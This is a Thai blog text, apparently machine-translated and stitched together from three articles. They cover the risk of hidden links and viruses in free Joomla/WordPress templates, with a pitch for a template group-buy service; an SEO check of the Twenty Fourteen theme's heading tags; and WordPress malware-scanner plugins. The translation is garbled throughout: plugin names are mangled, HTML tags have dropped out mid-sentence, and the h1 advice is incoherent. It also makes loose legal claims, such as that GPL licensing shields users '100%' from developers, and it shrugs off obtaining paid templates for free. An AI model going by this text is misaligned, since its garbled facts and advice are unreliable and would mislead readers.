สวัสดีผู้อ่านบล็อกไซต์ที่รัก ในปัจจุบันมีเว็บมาสเตอร์เพียงไม่กี่คนที่ออกแบบเว็บไซต์ด้วยตนเอง (ใช้ Html ล้วนๆ ซึ่งเป็นเครื่องมือของตนเอง หรืออย่างน้อยก็ใช้เทมเพลตที่สร้างขึ้นเองสำหรับ CMS) โดยทั่วไปนี่เป็นเรื่องจริงเพราะไม่ใช่ทุกคนสามารถสร้างสิ่งที่คุ้มค่าได้ - สิ่งนี้ต้องใช้ความสามารถของนักออกแบบ ส่วนใหญ่มักจะกลายเป็นว่าอย่างน้อยก็ "ไม่ค่อยดี" และบางครั้งก็ "แย่มาก"

นั่นคือเหตุผลว่าทำไมเทมเพลตหรือธีมการออกแบบ (ในเอ็นจิ้นที่แตกต่างกัน “สกิน” สามารถเรียกได้ด้วยคำที่ต่างกัน) สำหรับ CMS ยอดนิยมจึงแพร่หลายมาก โดยเฉพาะอย่างยิ่งความดีมากมายนี้สามารถพบได้บนอินเทอร์เน็ตสำหรับ Joomla และ WordPress เพราะนี่เป็นสิ่งที่ถูกต้องทั้งใน RuNet และในอินเทอร์เน็ตชนชั้นกลาง

ที่จริงแล้วมีแหล่งข้อมูลภาษารัสเซียอยู่มากมายพร้อมแคตตาล็อกเทมเพลตสำเร็จรูป ในชนชั้นกระฎุมพีไม่มีทางที่จะนับพวกมันได้ ทุกอย่างดูยอดเยี่ยมมาก - ติดตั้งเอ็นจิ้น ค้นหาเทมเพลตที่เหมาะสม (ไม่มีความลับว่าเทมเพลตแบบเสียเงินนั้นหาได้ฟรีไม่ยาก) ดาวน์โหลดและเพลิดเพลินกับการออกแบบเว็บไซต์ใหม่ของคุณอย่างมืออาชีพ สิ่งที่เหลืออยู่คือการเพิ่มเนื้อหาที่มีคุณค่าลงไปและคุณจะสามารถรับชมความนิยมของทรัพยากรของคุณที่เติบโตบนอินเทอร์เน็ต

แต่ไม่ใช่ทุกอย่างจะเรียบง่ายและชัดเจนนัก เมื่อฉันเขียนบทความเมื่อนานมาแล้วฉันได้รับคำแนะนำทางไปรษณีย์จากผู้อ่านค่อนข้างสม่ำเสมอให้ลบบริการนี้หรือบริการนั้นออกจากรายการเพราะในที่โพสต์อยู่ที่นั่น พบลิงก์ที่ซ่อนอยู่หรือแม้แต่ไวรัสในเทมเพลต- ปรากฎว่าสุภาษิตไม่ได้โกหก - ชีสฟรีเกิดขึ้นเฉพาะในกับดักหนูเท่านั้น นักพัฒนาเทมเพลตฟรี (หรือผู้ที่ "เสียเงิน" เป็นศูนย์) สร้างรายได้ด้วยวิธีนี้และทำได้มากเมื่อพิจารณาจากขอบเขต

ลิงก์ที่ซ่อนไปยังทรัพยากรของบุคคลที่สาม (และมักถูกขึ้นบัญชีดำโดยเครื่องมือค้นหา) และยิ่งกว่านั้นไวรัสสามารถทำลายความหวังทั้งหมดในการโปรโมตทรัพยากรของคุณ (หรือบ่อนทำลายพวกเขาอย่างจริงจังและทำให้ความกังวลของคุณเสีย) สำหรับสิ่งนี้คุณสามารถทำได้เช่นกัน คุณจะป้องกันตัวเองจากเรื่องทั้งหมดนี้ได้อย่างไรเมื่อเลือกเทมเพลต

เกิดอะไรขึ้นกับเทมเพลตฟรีสำหรับ Joomla และ WordPress?

โดย ประสบการณ์ของตัวเองพูดได้เลยว่าเป็นเรื่องยากมากสำหรับ "มือสมัครเล่น" ที่จะแข่งขันกับ "มืออาชีพ" ในตอนต้นของเอกสารนี้ ฉันได้ให้ลิงก์ไปยังบทความเกี่ยวกับไวรัสที่ติดไวรัสในเว็บไซต์ส่วนใหญ่ของฉัน สิ่งนี้เกิดขึ้นเมื่อกว่าสองปีที่แล้ว และในช่วงเวลานี้ ฉันได้ต่อสู้ครั้งยิ่งใหญ่ซ้ำแล้วซ้ำเล่าเพื่อ "ความบริสุทธิ์ของโค้ด" มากกว่าหนึ่งครั้ง แต่อาการกำเริบยังคงเกิดขึ้นด้วยความสม่ำเสมอที่น่าอิจฉาในทรัพยากรจำนวนหนึ่งที่ติดไวรัส (ไม่ว่าจะส่งสแปมจากพวกเขา หรือ ทางเข้าประตูถูกสร้างขึ้นจากนั้นมีบางอย่างที่ฉันไม่สามารถเข้าใจได้อย่างสมบูรณ์เกิดขึ้นซึ่งนำไปสู่ภาระมหาศาลบนโฮสติ้ง)

ในเวลาเดียวกัน ฉันใช้วิธีการทั้งหมดที่มีสำหรับ "มือใหม่" เพื่อค้นหาเชลล์และประตูหลังอื่นๆ ในโค้ดของไซต์เหล่านี้ แต่ขอย้ำอีกครั้งว่ามือสมัครเล่นไม่สามารถแข่งขันกับมืออาชีพได้ ดังนั้นหากคุณคิดว่าคุณสามารถลบไวรัสที่แอบเข้าไปในเทมเพลตได้อย่างง่ายดาย เป็นไปได้มากว่าคุณคิดผิด นี่เป็นเรื่องที่น่าหดหู่และน่ารำคาญอย่างยิ่ง (เมื่อกิจกรรมของไวรัสปรากฏขึ้นครั้งแล้วครั้งเล่าแม้ว่าคุณจะพยายามอย่างเต็มที่ก็ตาม) และต้องใช้เวลาและความพยายามอย่างมาก

เหมือนกัน ใช้กับลิงก์ที่ซ่อนไว้ด้วย- เป็นเรื่องดีหากคุณพบตัวเลือกในการแนะนำพวกเขาจากยุคก่อน เมื่อคุณสามารถหาที่ที่จะแทรกและกำจัดมันออกไปได้ตลอดไป ในที่สุดก็ได้เทมเพลตที่สะอาดตาและฟรี ในกรณีส่วนใหญ่ ทุกอย่างจะซับซ้อนกว่ามาก หากต้องการค้นหาตำแหน่งที่จะแทรกลิงก์ที่ซ่อนอยู่คุณจะต้องใช้ซอฟต์แวร์ (เช่นปลั๊กอิน TAC) แต่ก็ไม่ได้มีอำนาจทุกอย่างเนื่องจากธุรกิจการกระจายลิงก์ผ่านเทมเพลต Joomla และ WordPress ฟรีและจ่ายเงิน (แฮ็ก) สร้างรายได้ที่ดีมาก ซึ่งสนับสนุนให้ผู้คนฝึกฝนเพื่อค้นหาวิธีแก้ปัญหาใหม่ๆ ที่ทำให้ "บุ๊กมาร์ก" ของพวกเขาถูกมองเห็นได้น้อยลง

จริงๆ แล้ว ทุกวันนี้การตรวจสอบเทมเพลตเพื่อสร้าง "ลิงก์ซ้าย" อย่างรวดเร็วอาจเป็นเรื่องยากทีเดียว ตัวอย่างเช่น คุณดาวน์โหลดเทมเพลต วางไว้บนเว็บไซต์ เพิ่มเนื้อหา และตัดสินใจว่ามีรายการที่น่าสงสัย (คุณไม่ได้ป้อน) ปรากฏขึ้นหรือไม่ ลิงค์ภายนอก- ไม่มีเลย คุณมีความสุข ลืมปัญหานี้ไปได้เลย กำลังยุ่งอยู่กับการเติมไซต์และโปรโมตมัน แล้วจู่ๆ คุณก็ค้นพบโดยบังเอิญ (ด้วยตัวคุณเองหรือหลังจากสัญญาณจากเครื่องมือค้นหาในรูปแบบของตัวกรองหรือการแบน) ว่ายังมีลิงก์ที่ซ่อนอยู่ และพวกมันนำไปสู่ ​​"โคลน" ดังกล่าว ซึ่งคุณเองก็ไม่เคยคิดจะพูดถึงด้วยซ้ำ

สิ่งที่น่ารังเกียจที่สุดเกี่ยวกับเรื่องนี้ก็คือ เพื่อลบตัวกรองและทำให้ไซต์ "ขาวขึ้น" ในสายตาของเครื่องมือค้นหาอาจใช้เวลานานมาก (ในบางกรณีเป็นเดือนหรือเป็นปี) แต่ประเด็นก็คือผู้พัฒนา "บุ๊กมาร์ก" ดังกล่าวทราบว่าคุณรู้เกี่ยวกับพวกเขา และตรวจสอบไซต์หลังจากติดตั้งเทมเพลตเพื่อหา "ส่วนเกินที่ไม่ดีทุกประเภท" ดังนั้นพวกเขาจึงชะลอการเริ่มต้นสร้างลิงก์เหล่านี้ไประยะหนึ่ง ซึ่งเพียงพอในความเห็นของพวกเขาแม้แต่ผู้ใช้ที่น่าสงสัยที่สุดที่จะเชื่อในความบริสุทธิ์ของเทมเพลตที่เขาได้รับฟรี

ยิ่งไปกว่านั้น ลิงก์ที่ซ่อนไว้ได้รับการเข้ารหัสในลักษณะที่ไม่ค้นหาโดยใช้คำว่า md5 หรือ base64 (มักโหลดจากแหล่งภายนอก) เป็นเพียงชุดตัวอักษรและอักขระพิเศษที่ไม่สามารถค้นหาได้จากไฟล์เทมเพลตทั้งหมด และอาจมีไฟล์เหล่านี้มากกว่าหนึ่งร้อยไฟล์ นอกจากนี้ลิงก์จะไม่ปรากฏทันที นั่นคือในความเป็นจริง ผู้ดูแลเว็บ (โดยเฉลี่ย) เป็นไปไม่ได้ที่จะตรวจพบพวกเขาในขั้นตอนของการสร้างเว็บไซต์

เพื่อหลีกเลี่ยงการติดเชื้อผ่านเทมเพลต I ฉันชอบที่จะจ่ายเงินเพื่อไม่ให้ต้องจัดการกับปัญหามากมายในภายหลัง อีกอย่างคือจ่ายได้มากหรือจ่ายไม่มากก็ได้ ฉันเลือกตัวเลือกที่สองเป็นการส่วนตัว แต่ก่อนอื่นฉันจะอธิบายสาระสำคัญของตัวเลือกแรก

แน่นอนว่าสามารถพบบางสิ่งได้และ ในคลังอย่างเป็นทางการของเครื่องยนต์เหล่านี้(อ่านเกี่ยวกับเรื่องนั้นและไปที่เว็บไซต์อย่างเป็นทางการของส่วนขยายสำหรับ Joomla) แต่ประการแรก ตัวเลือกมีจำกัดอย่างมาก และประการที่สอง เว็บไซต์อีกหลายพันแห่งทั่วโลกจะแต่งกายด้วย "เสื้อผ้า" แบบเดียวกันซึ่งค่อนข้างลดลง ความเป็นเอกลักษณ์ของโครงการของคุณทั้งในสายตาของผู้เยี่ยมชมและในสายตาของเครื่องมือค้นหา

อย่างไรก็ตาม มีบริษัทมืออาชีพหลายแห่งในโลกที่พัฒนาเทมเพลตแบบชำระเงินสำหรับ Joomla และ WordPress นิรนัย () พวกเขาไม่ควรมีบุ๊กมาร์ก มิฉะนั้นพวกเขาจะสูญเสียอำนาจและความไว้วางใจของลูกค้าทันที อย่างไรก็ตาม ราคาสำหรับเทมเพลตหนึ่งรายการอาจอยู่ที่ 50-100 ดอลลาร์ ขึ้นอยู่กับฟังก์ชันการทำงานและความแปลกใหม่

นอกจากนี้อาจเกิดปัญหากับการชำระเงิน (คุณจะต้องรับความเสี่ยงและทำการซื้อด้วยการชำระเงินโดยตรงจาก บัตรพลาสติก- อย่างไรก็ตาม คุณจะได้รับเทมเพลตที่ "สะอาด" โดยเจตนาซึ่งเป็นสิ่งที่ดี จริงอยู่ การสนับสนุนทางเทคนิคที่มาพร้อมกับมันจะเกี่ยวข้องก็ต่อเมื่อคุณรู้ภาษาที่มีให้เท่านั้น ในกรณีส่วนใหญ่ ความรู้ภาษารัสเซียจะไม่ช่วยคุณในเรื่องนี้

ฉันชอบตัวเลือกที่สองมากกว่าเนื่องจากมีความสามารถในการทำกำไรสูงกว่า (อัตราส่วนของเงินที่ใช้ไปต่อโอกาสที่ได้รับ) แม้ว่าจะไม่ "ขาว" เลยเมื่อเทียบกับนักพัฒนาก็ตาม สาระสำคัญของมันคือ Joomla และ WordPress เผยแพร่ภายใต้ใบอนุญาต GNU/GPL, เช่น. ใบอนุญาตฟรี ซอฟต์แวร์(ซอฟต์แวร์ดังกล่าวสามารถใช้ คัดลอก ดัดแปลง และแจกจ่ายได้) จริงๆ แล้ว ฉันเคยเขียนเกี่ยวกับเรื่องนี้ไปแล้วในบทความเกี่ยวกับเทมเพลต Joomla ที่กล่าวถึงในตอนต้น

ประเด็นก็คือส่วนขยาย (เทมเพลต ปลั๊กอิน ฯลฯ) สำหรับกลไกเหล่านี้ไม่สามารถเป็นทรัพย์สินส่วนตัวของผู้เขียนได้โดยไม่ต้องลงรายละเอียดมากเกินไป ใช่ คุณสามารถเรียกร้องการชำระเงินได้ แต่จะเป็นไปไม่ได้อีกต่อไปที่จะลงโทษหรือดำเนินคดีสำหรับการใช้หรือการเผยแพร่ส่วนขยายเหล่านี้โดยไม่ได้รับอนุญาต อย่างไรก็ตามเรื่องนี้ตลาด ส่วนขยายที่ต้องชำระเงินสำหรับ Joomla และ WordPress นั้นมีขนาดใหญ่มาก ไม่ได้รับการคุ้มครองตามกฎหมายลิขสิทธิ์- ในทางตรงกันข้าม ลิขสิทธิ์ GNU/GPL ปกป้องคุณจากนักพัฒนาได้ 100%

อย่างไรก็ตาม บริษัทพัฒนาหลายแห่งให้สิทธิ์ในการเข้าถึงเทมเพลตของตนโดยการสมัครสมาชิก เหล่านั้น. คุณชำระเงินจำนวนหนึ่งและในช่วงเวลาหนึ่งคุณสามารถดาวน์โหลดและใช้ผลงานสร้างสรรค์ทั้งหมด (เทมเพลตหรือส่วนขยาย) ต่อไปได้อย่างต่อเนื่อง จริงๆ แล้ววิธีที่สอง ใบเสร็จรับเงินที่ปลอดภัยธีมการออกแบบสำหรับ WordPress รวมถึงเทมเพลตสำหรับ Joomla นั้นสร้างขึ้นจากหลักการเดียวกันโดยประมาณ

ไม่นานมานี้ เพื่อนของฉันคนหนึ่งซึ่งฉันได้กล่าวถึงในบทความหลายบทความ “ชี้นิ้วมาที่ฉัน” (เขามองหาตัวเลือกที่เหมาะสมที่สุดสำหรับการสร้างร้านค้าออนไลน์มาหลายปีแล้วและตามเส้นทางนี้ เขาพบสิ่งต่าง ๆ มากมายที่ดูน่าสนใจสำหรับฉันและมีการใช้อย่างแข็งขันในอนาคต) . เรากำลังพูดถึงการรวมเทมเพลตและส่วนขยายระดับพรีเมียมเข้าด้วยกัน CmsHeaven.org .

สาระสำคัญของการระดมทุนนั้นค่อนข้างง่าย - ซื้อผลิตภัณฑ์และแจกจ่ายให้กับทุกคนที่เข้าร่วมในการระดมทุน CmsHeaven.org ได้ทำให้โครงร่างง่ายขึ้น - ไม่จำเป็นต้องแยกส่วนสำหรับเทมเพลตหรือส่วนขยายแต่ละรายการที่คุณต้องการ คุณเพียงแค่จ่ายเงินสำหรับการเข้าถึงแค็ตตาล็อกทั้งหมดที่บริการนี้มีไว้ชั่วคราว (หลายพันชื่อ แบ่งเพื่อความสะดวกในการค้นหาตามเครื่องมือ ผู้แต่ง และหัวข้อ)

ผลิตภัณฑ์ที่นำเสนอแต่ละรายการได้รับการซื้ออย่างซื่อสัตย์จากนักพัฒนาด้วยเงินของผู้ฝาก (ยังมีเทมเพลตฟรี แต่นำเสนอโดยแบรนด์ที่มีชื่อเสียงอีกครั้งซึ่งพวกเขาต้องการเพื่อการโฆษณา) และสิ่งที่สำคัญคือผู้จัดงานอัปเดตแคตตาล็อกด้วยสำเนาใหม่อย่างต่อเนื่อง (อย่างที่พวกเขาพูดในช่วงเวลาที่ร้อนแรง) ซึ่งจะต้องรอเป็นเวลานานในที่สาธารณะ หลายคนคงจะชอบสิ่งนี้

โดยทั่วไป นี่คือสหกรณ์ที่คุณสามารถเข้าร่วมและรับสิทธิประโยชน์ทั้งหมดได้ แต่ด้วยข้อจำกัดบางประการ ความจริงก็คือผู้จัดงานตระหนักดีว่าหากไม่มีข้อจำกัด แค็ตตาล็อกทั้งหมดจะรั่วไหลสู่สาธารณะในเวลาไม่นาน ดังนั้นจึงเกิดขึ้น จำกัดการดาวน์โหลด 36 ครั้งต่อเดือน- ซึ่งเพียงพอแล้วสำหรับผู้ดูแลเว็บทั่วไปและแม้แต่บริษัทสร้างเว็บไซต์

นี้รับประกัน ขาดในส่วนขยายและเทมเพลตที่นำเสนอ "บุ๊กมาร์ก"(ลิงก์ที่ซ่อนอยู่ ไวรัส โทรจันและสนิชที่แจ้งให้นักพัฒนาทราบเกี่ยวกับไซต์โดยใช้เทมเพลต) ด้วยเหตุนี้จึงซื้อเฉพาะผลิตภัณฑ์จากแบรนด์ที่มีชื่อเสียงเท่านั้น โอเพ่นซอร์สซึ่งคุณสามารถตรวจสอบทั้งหมดนี้ได้ และหากจำเป็น ให้กำจัดทิ้ง

ส่วนขยายบางส่วนได้รับการแปลเป็นภาษารัสเซีย และหากเกิดปัญหากับการติดตั้งหรือการกำหนดค่า ซึ่งมักมีความจำเป็นมาก (คุณอาจใช้อินเทอร์เน็ตมากกว่าหนึ่งครั้งเพื่อค้นหาวิธีแก้ไขปัญหาที่เกิดขึ้นโดยไม่คาดคิด) . อย่างไรก็ตาม นี่คือสิ่งที่ทำให้เอ็นจิ้นฟรีแตกต่างจากเอ็นจิ้นที่ต้องเสียเงินซึ่งไม่มีการสนับสนุนผู้ใช้เช่นนี้

ใช่ และคุณสามารถดาวน์โหลดผลิตภัณฑ์ที่คุณต้องการได้ ความเร็วปกติและไม่ต้องดูโฆษณาบนบริการโฮสต์ไฟล์ มันเป็นเรื่องเล็ก ๆ น้อย ๆ เพราะเพื่อให้ได้ "น่ารัก" ที่เป็นเจ้าข้าวเจ้าของคุณสามารถย้ายภูเขาได้และไม่ใช่แค่ต่อสู้กับบริการโฮสต์ไฟล์เท่านั้น แต่ยังเป็นเรื่องเล็ก ๆ น้อย ๆ ที่ประกอบกันเป็นความสะดวกสบาย

โดยทั่วไปแล้ว ฉันชอบแนวคิดและการนำไปใช้จริงมาก แต่ฉันควรใช้เทมเพลตฟรีจากคลัง Joomla และ WordPress ฉันควรเข้าร่วมบน CmsHeaven.org หรือซื้อเทมเพลตโดยตรงจากนักพัฒนา คุณจะต้องตัดสินใจด้วยตัวเอง- เพียงแค่ "ฉันขอร้องคุณอย่ากินมะเขือเทศดิบตอนกลางคืน" นั่นคืออย่าดาวน์โหลดผลิตภัณฑ์ฟรีจากแหล่งข้อมูลที่ "ยอดเยี่ยม" ใด ๆ เพราะคุณอาจประสบปัญหามากมายได้ คุณต้องการมันไหม?

ขอให้โชคดี! พบกันเร็ว ๆ นี้ในหน้าของเว็บไซต์บล็อก

คุณอาจจะสนใจ

วิธีแทรกโค้ดตัวนับการเข้าชมลงในไซต์ที่ใช้งาน Joomla โดยใช้โมดูลโค้ด HTML แบบกำหนดเองหรือลงในเทมเพลตโดยตรง
จะสร้างเว็บไซต์นามบัตรมืออาชีพด้วยตัวเองโดยไม่ต้องมีความรู้ Html, CSS และ PHP ได้อย่างไร? คำตอบ: MotoCMS!
วิธีรับเทมเพลตที่ปรับเปลี่ยนได้สำหรับเว็บไซต์ในอนาคต และด้วย CMS ที่ใช้งานง่ายและรวดเร็วในการบูต
10 ข้อผิดพลาดร้ายแรงเมื่อเขียนและเผยแพร่บทความ
การสร้างรายการเมนูใน Joomla เพื่อเข้าสู่ฟอรัมและถ่ายโอนการลงทะเบียนผู้ใช้จาก SMF ไปยังไซต์
การตั้งค่า JFusion สำหรับการผสาน ฟอรั่ม SMFและเว็บไซต์ Joomla
โมดูล JFusion สำหรับแสดงข้อความจากฟอรัมบนเว็บไซต์พร้อมสร้างปุ่มใน SMF เพื่อกลับสู่ Joomla เว็บพอยต์โปร - ธีมที่ตอบสนองสำหรับ WordPress ที่มีฟังก์ชันการทำงานที่หลากหลายและเทคนิคที่เชี่ยวชาญ การเพิ่มประสิทธิภาพกลไกค้นหา
Share42 - สคริปต์สำหรับเพิ่มปุ่มลงในไซต์ เครือข่ายทางสังคมและบุ๊กมาร์ก (มีตัวเลือกแผงลอย)
การติดตั้ง SMF Forum - การรวม Joomla 1.5 และ Simple Machines Forum โดยใช้ส่วนประกอบ JFusion

เมื่อคุณเลือกเทมเพลตที่จะติดตั้งบนเว็บไซต์ WordPress ของคุณแล้ว ก็ควรตรวจสอบเลย์เอาท์เพื่อให้สอดคล้องกับกฎพื้นฐานของ SEO (การเพิ่มประสิทธิภาพ) ตัวอย่างเช่น มีการจัดวางเทมเพลตกล่อง "ยี่สิบสี่" เพื่อให้ชื่อวิดเจ็ตแสดงในแท็ก

หาความพร้อมยากมาก เทมเพลตเวิร์ดเพรสตอบสนองความต้องการของคุณอย่างสมบูรณ์ บ่อยครั้งที่คุณชอบเทมเพลตที่เลือก แต่คุณไม่พอใจกับโทนสีหรือคุณไม่ชอบตำแหน่งของแถบด้านข้าง ส่วนหัว แบบอักษร ฯลฯ แพลตฟอร์ม WP มีความเป็นไปได้ทั้งหมดในการเปลี่ยนเทมเพลต WordPress ให้เหมาะกับความต้องการของคุณ

ตัวอย่างเช่น เรามาแก้ไขเทมเพลต WordPress ชนิดบรรจุกล่องชื่อ “Twenty Fourteen” เทมเพลตนี้จะทำหน้าที่เป็นตัวอย่างเชิงปฏิบัติซึ่งคุณสามารถเห็นความแตกต่างของค่าปรับทั้งหมดและไม่เพียงเท่านั้น การปรับแต่งอย่างละเอียดเทมเพลตเวิร์ดเพรส

กำลังเตรียมแก้ไขเทมเพลต

ก่อนที่จะทำงานกับโค้ด WordPress รวมถึงการเปลี่ยนเทมเพลตการทำงาน คุณต้องทำและเตรียม:

• (แค็ตตาล็อกและฐานข้อมูล) ;
• สำเนาสำรองของเทมเพลตการทำงาน (แก้ไขได้)

ต้องกำหนดค่าเทมเพลตไว้ก่อนหน้านี้บนแท็บ รูปร่าง→การตั้งค่า

บันทึก:หากต้องการเปลี่ยนแปลงเทมเพลตอย่างถาวร คุณต้องไปที่ การรันบนธีมย่อยของ WordPress ช่วยให้คุณสามารถอัปเดตเทมเพลตได้โดยไม่สูญเสียการเปลี่ยนแปลง

วิธีปรับแต่งเทมเพลต WordPress “ยี่สิบสี่” ด้วยตัวคุณเอง

ฉันจะพยายามแสดงหลักการเปลี่ยนเทมเพลตซึ่งจะช่วยให้คุณทำการเปลี่ยนแปลงเทมเพลต WordPress ของคุณเองได้

ดังนั้นภารกิจ:มีเทมเพลต "ยี่สิบสี่" รูปภาพ 1 เราทำการเปลี่ยนแปลงแบบกำหนดเองกับเทมเพลต ในเวลาเดียวกันเราตรวจสอบเค้าโครงของเทมเพลตเพื่อให้แน่ใจว่าเป็นไปตามกฎ การเพิ่มประสิทธิภาพ SEO.

บันทึก:ฉันทราบว่าผู้เขียนเทมเพลตจำนวนมากสร้างการตั้งค่าที่กำหนดค่าได้ใหม่สำหรับเทมเพลตของตน โดยแสดงอินเทอร์เฟซการตั้งค่าบนแท็บแยกต่างหาก เมื่อทำงานกับเทมเพลตดังกล่าว คุณสามารถตั้งค่าเทมเพลตแบบกำหนดเองได้อย่างง่ายดายโดยไม่ต้องเปลี่ยนโค้ดเทมเพลต นี่ไม่ใช่ตัวเลือกที่อธิบายไว้ในบทความนี้

การตรวจสอบเค้าโครงเทมเพลตสำหรับกฎ SEO

มาดูเค้าโครงของเทมเพลตกันก่อน ก่อนตรวจสอบ ให้ตั้งค่าเทมเพลตที่จำเป็น

ในการตรวจสอบเค้าโครงว่าสอดคล้องกับกฎ SEO เราจะต้อง:

• วางวิดเจ็ตใดๆ ไว้บนแถบด้านข้างของเทมเพลต ให้มันเป็นปฏิทิน เราจะตั้งชื่อวิดเจ็ตให้อย่างแน่นอน
• สร้างหน้าทดสอบและโพสต์ไซต์ทดสอบ

ขั้นตอนในการตรวจสอบเค้าโครงเทมเพลตสำหรับกฎ SEO

ขั้นตอนที่ 1: ตรวจสอบหน้าแรก

สำคัญ! หน้าเว็บไซต์ไม่ควรมีแท็ก h1 มากกว่าสองแท็ก หนึ่งที่เปิด

, ปิดครั้งที่สอง

สิ่งนี้จำเป็นต้องได้รับการแก้ไข การแก้ไขอยู่ด้านล่าง

ย้ำ!หน้าเว็บไซต์ไม่ควรมีแท็ก h1 มากกว่าสองแท็ก หนึ่งที่เปิด

, ปิดครั้งที่สอง

ขั้นตอนที่ 2 ทดสอบหน้าโพสต์ทดสอบ

หลังจากหน้าหลักของเว็บไซต์ เราจะเปิดโพสต์ทดสอบของเว็บไซต์ ที่นี่เราจะตรวจสอบว่ามีเพียงชื่อโพสต์เท่านั้นที่ถูกรวมไว้ในแท็ก h1 เราทำการตรวจสอบในลักษณะเดียวกับการโพสต์บนเว็บไซต์ เฉพาะชื่อหน้าเท่านั้นที่ควรหุ้มด้วยแท็ก h1

ขั้นตอนที่ 3: การตรวจสอบวิดเจ็ต

ในทำนองเดียวกัน ให้ดูที่แท็กชื่อเรื่องของวิดเจ็ตในแถบด้านข้างและส่วนท้าย

ผลลัพธ์ของการตรวจสอบโครงร่าง

จากการตรวจสอบเค้าโครงเทมเพลตบนเทมเพลตนี้ เราพบว่าส่วนหัวของวิดเจ็ตในส่วนท้ายและแถบด้านข้างของไซต์ถูกรวมไว้ในแท็ก h1 สิ่งนี้จำเป็นต้องได้รับการแก้ไข.

ถ้าเราพบว่า หน้าแรกประกาศบทความจะแสดงในแท็ก h1 นั่นคือในหน้าโพสต์ล่าสุดมีหลายหัวข้อใน h1 เราอ่านบทความและกำจัดข้อผิดพลาดเค้าโครง SEO นี้

หัวข้อของบทความมีขนาดใหญ่กว่าที่ฉันคาดไว้ ดังนั้นฉันจะต้องเปลี่ยนเทมเพลต WordPress ให้เหมาะกับตัวเอง กล่าวคือ เปลี่ยนรูปลักษณ์ เราจะดำเนินการในบทความถัดไป ขั้นแรก คุณสามารถอ่านบทความ: กฎการจัดวางสำหรับไฟล์สไตล์แบบเรียงซ้อนของ WordPress

WordPress เป็นเครื่องมือยอดนิยมสำหรับการสร้างเว็บไซต์และบล็อกข้อมูลต่างๆ ความปลอดภัยของเว็บไซต์ของคุณเป็นมากกว่าความปลอดภัยของข้อมูลของคุณ สิ่งนี้สำคัญกว่ามาก เนื่องจากเป็นความปลอดภัยของผู้ใช้ทุกคนที่อ่านและเชื่อถือทรัพยากรของคุณ ด้วยเหตุนี้จึงเป็นเรื่องสำคัญมากที่ไซต์จะต้องไม่ติดไวรัสหรือโค้ดที่เป็นอันตรายอื่นๆ

เราจะดูวิธีป้องกัน WordPress จากการแฮ็กในบทความต่อไปนี้ แต่ตอนนี้ฉันต้องการบอกวิธีตรวจสอบเว็บไซต์ WordPress เพื่อหาไวรัสและโค้ดที่เป็นอันตรายเพื่อให้แน่ใจว่าทุกอย่างปลอดภัย

ตัวเลือกแรกที่นึกถึงคือ คุณถูกแฮ็กโดยแฮกเกอร์ และสร้างแบ็คดอร์ของพวกเขาไว้ในโค้ดของเว็บไซต์ของคุณ เพื่อให้สามารถส่งสแปม ใส่ลิงก์ และสิ่งเลวร้ายอื่น ๆ ได้ สิ่งนี้เกิดขึ้นบางครั้ง แต่เป็นกรณีที่ค่อนข้างหายากหากคุณอัปเดตซอฟต์แวร์ตรงเวลา

มีธีม WordPress ฟรีและปลั๊กอินต่าง ๆ มากมายและนี่อาจเป็นภัยคุกคามอยู่แล้ว มันเป็นสิ่งหนึ่งเมื่อคุณดาวน์โหลดเทมเพลตจากไซต์ WordPress และอีกสิ่งหนึ่งเมื่อคุณพบมันบนไซต์ด้านซ้าย นักพัฒนาที่ไร้ศีลธรรมสามารถฝังโค้ดที่เป็นอันตรายต่างๆ ลงในผลิตภัณฑ์ของตนได้ ความเสี่ยงจะยิ่งเพิ่มมากขึ้นหากคุณดาวน์โหลดเทมเพลตพรีเมียมฟรี โดยที่แฮกเกอร์สามารถเพิ่มช่องโหว่ด้านความปลอดภัยบางประเภทโดยไม่ต้องเสี่ยงใดๆ ซึ่งพวกเขาสามารถเจาะทะลุและทำสิ่งที่พวกเขาต้องการได้ นี่คือเหตุผลว่าทำไมการตรวจสอบเว็บไซต์ WordPress เพื่อหาไวรัสจึงมีความสำคัญมาก

ตรวจสอบไซต์ WordPress เพื่อหาไวรัส

สิ่งแรกที่คุณต้องคำนึงถึงเมื่อตรวจสอบไซต์ไม่ใช่ไวรัส นี่คือปลั๊กอิน WordPress อย่างรวดเร็วและง่ายดาย คุณสามารถสแกนไซต์ของคุณและค้นหาส่วนโค้ดที่น่าสงสัยซึ่งควรค่าแก่การใส่ใจ ไม่ว่าจะอยู่ในธีม ปลั๊กอิน หรือแกนหลักของ Wodpress ก็ตาม ลองดูปลั๊กอินยอดนิยมบางส่วน:

1.ตค

ปลั๊กอินที่เรียบง่ายนี้จะตรวจสอบธีมทั้งหมดที่ติดตั้งบนเว็บไซต์ของคุณเพื่อดูว่ามีโค้ดที่เป็นอันตรายหรือไม่ ปลั๊กอินตรวจพบลิงก์ที่ซ่อนอยู่ซึ่งเข้ารหัสโดยใช้การแทรกโค้ด base64 และยังแสดงข้อมูลโดยละเอียดเกี่ยวกับปัญหาที่พบ ส่วนใหญ่แล้วชิ้นส่วนของโค้ดที่พบไม่ใช่ไวรัส แต่อาจเป็นอันตรายได้ ดังนั้นคุณควรใส่ใจกับชิ้นส่วนเหล่านั้น

เปิด "รูปร่าง" -> “แทค”จากนั้นรอจนกว่าจะตรวจสอบหัวข้อทั้งหมด

2. เครื่องสแกนวีไอพี

คล้ายกับเครื่องสแกน TOC มากสำหรับหัวข้อ แต่ให้ผลลัพธ์มากกว่า ข้อมูลรายละเอียด- ความสามารถในการตรวจจับลิงก์เดียวกัน รหัสที่ซ่อนอยู่และส่วนแทรกที่เป็นอันตรายอื่นๆ เพียงเปิดรายการ VIP Scanner ในส่วนเครื่องมือแล้ววิเคราะห์ผลลัพธ์

คงจะพอถอนออกได้. ไฟล์พิเศษเช่น desktop.ini หรือคุณต้องดูรายละเอียดเพิ่มเติมว่าเกิดอะไรขึ้นในไฟล์ที่ใช้ base64

3. ป้องกันมัลแวร์จาก GOTMLS.NET

ปลั๊กอินนี้ช่วยให้คุณไม่เพียงแต่สแกนธีมและแกนหลักของไซต์เพื่อหาไวรัสเท่านั้น แต่ยังช่วยปกป้องไซต์จากรหัสผ่านแบบ Brute Force และการโจมตี XSS, SQLInj ต่างๆ การค้นหาจะดำเนินการตามลายเซ็นและช่องโหว่ที่ทราบ ช่องโหว่บางอย่างสามารถแก้ไขได้บนเว็บไซต์ หากต้องการเริ่มสแกนไฟล์ ให้เปิด "ต่อต้านมัลแวร์"ในเมนูด้านข้างแล้วคลิก "เรียกใช้การสแกน":

ก่อนที่คุณจะสามารถรันการสแกนได้ คุณจะต้องอัพเดตฐานข้อมูลลายเซ็นก่อน

4. เวิร์ดเฟนซ์

